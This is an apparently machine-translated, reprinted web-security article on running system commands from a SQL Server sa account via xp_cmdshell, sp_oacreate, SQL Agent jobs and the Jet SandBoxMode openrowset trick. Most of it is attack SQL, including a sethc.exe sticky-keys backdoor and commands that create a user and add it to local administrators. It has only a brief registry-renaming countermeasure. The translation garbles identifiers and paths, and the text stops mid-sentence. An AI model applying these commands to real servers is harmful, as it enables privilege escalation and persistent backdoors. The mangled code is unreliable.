Sa command execution method summary

Reprinted with the source: BK instant group
Initial launchWeb Security Manual

//////////////////////////////////////// ////////////////////////////////
Sa command execution method summary

By invincible cucumber
//////////////////////////////////////// ////////////////////////////////

Test environment: windows xp pro sp2 + mssql 2005 (the service is started with the system permission)

1. xp_cmdshell

EXECMaster ..Xp_mongoshell Ipconfig

Enable xp_cmdshell:

-- To allow advanced options to be changed.

EXEC sp_configure show advanced options, 1

GO

-- To update the currently configured value for advanced options.

RECONFIGURE

GO

-- To enable the feature.

EXEC sp_configure xp_cmdshell, 1

GO

-- To update the currently configured value for this feature.

RECONFIGURE

GO

Ii. sp_oacreate

Create a wscript. shell object

UseMasterDeclare@ OInt execSp_oacreateWscript. shell, @ O outExecSp_oamethod @ o,Run, Null,Cmd/c "net user"> c: est. tmp

Create a scripting. filesystemobject object

Declare@ OInt

ExecSp_oacreateScripting. filesystemobject, @ O out

ExecSp_oamethod @ o,Copyfile, Null,C: windowsexplorer.exe,C: windowssystem32sethc.exe;

Declare@ OoInt

ExecSp_oacreateScripting. filesystemobject, @ Oo outExecSp_oamethod @ oo,Copyfile, Null,C: windowssystem32sethc.exe,C: windowssystem32dllcachesethc.exe;

You can use utilman.exeto replace sethc.exe to achieve the same effect.Is the backdoor cool?

Create a Shell. Application Object

Declare@ OInt

ExecSp_oacreateShell. Application, @ O out

ExecSp_oamethod @ o,ShellExecute, Null,Cmd.exe,Cmd/c net user> c: est.txt,C: windowssystem32,, 1;

Enable OLE Automation Procedures

Sp_configure show advanced options, 1;

GO

RECONFIGURE;

GO

Sp_configure Ole Automation Procedures, 1;

GO

RECONFIGURE;

GO

Our Countermeasure is to put objects in the hands and feet

WScript. Shell can call the system kernel to run basic dos Commands

You can modify the registry and rename the component to prevent hazards.

HKEY_CLASSES_ROOTWScript.Shell

And HKEY_CLASSES_ROOTWScript.Shell.1

Change the name to another name, for example, WScript. Shell_ChangeName or WScript. Shell.1 _ ChangeName.

You can call this component normally when you call it later.

Also change the clsid value.

Value of the HKEY_CLASSES_ROOTWScript.ShellCLSID Project

Value of the HKEY_CLASSES_ROOTWScript.Shell.1CLSID Project

Same as wscript. shell, scripting. filesystemobject, Shell. Application

Iii. JOB

To use a JOB to execute commands, you must enable the SQLSERVERAGENT service. The following statement can be used to enable

ExecMaster. dbo. xp_servicecontrol start, SQLSERVERAGENT

UseMsdbCreate table[Jncsql] (resulttxtNvarchar(1024) null)Exec Sp_delete_jobNull,X Exec Sp_add_job X Exec

Sp_add_jobstepNull,X, Null,1,Cmdexec,Cmd/c "net user> c: est. test" Exec Sp_add_jobserver

Null,X,@ Servername Exec Sp_start_job X;

4. SandBoxMode)

Principle: Call the shell function of VBS in access and execute any command with the system permission. However, before using this function, you must enable the SandBoxmode switch in the registry,

Registry: HKEY_LOCAL_MACHINESoFtWareMicris

OftJet4.0EngineSandBoxmode. The default value is 2. The human key value is 0, indicating the start time.

SandBoxmode is disabled. 1 indicates that the SandBoxmode mode is used for non-Acess applications, 2 indicates that the access application uses SandBoxmode, and 3 indicates that the security settings are fully enabled.// Commands 1 or 0 can be executed

EXEC sp_addmediaserver testsql, ole db Provider for Jet, Microsoft. Jet. OLEDB.4.0, c: windowssystem32iasias. mdb

ExecMaster .. xp_regwriteHKEY_LOCAL_MACHINE,SOFTWAREMicrosoftJet4.0Engines,SandBoxMode,REG_DWORD, 1

EXECMaster .. xp_regread HKEY_LOCAL_MACHINE,SoftwareMicrosoftJet4.0engines,SandBoxMode

Select*From openrowset(Microsoft. jet. oledb.4.0,; Database = c: windowssystem32iasias. mdb,Select shell ("cmd.exe/c net user test/add "))

Select*From openrowset(Microsoft. jet. oledb.4.0,

; Database = c: windowssystem32iasias. mdb,Select shell ("cmd.exe/c net localgroup administrators test/add "))

The following two mdb files are provided by the system:

C: WINDOWSsystem32iasdnary. mdb
C: WINDOWSsystem32iasias. mdb

Summary

The preceding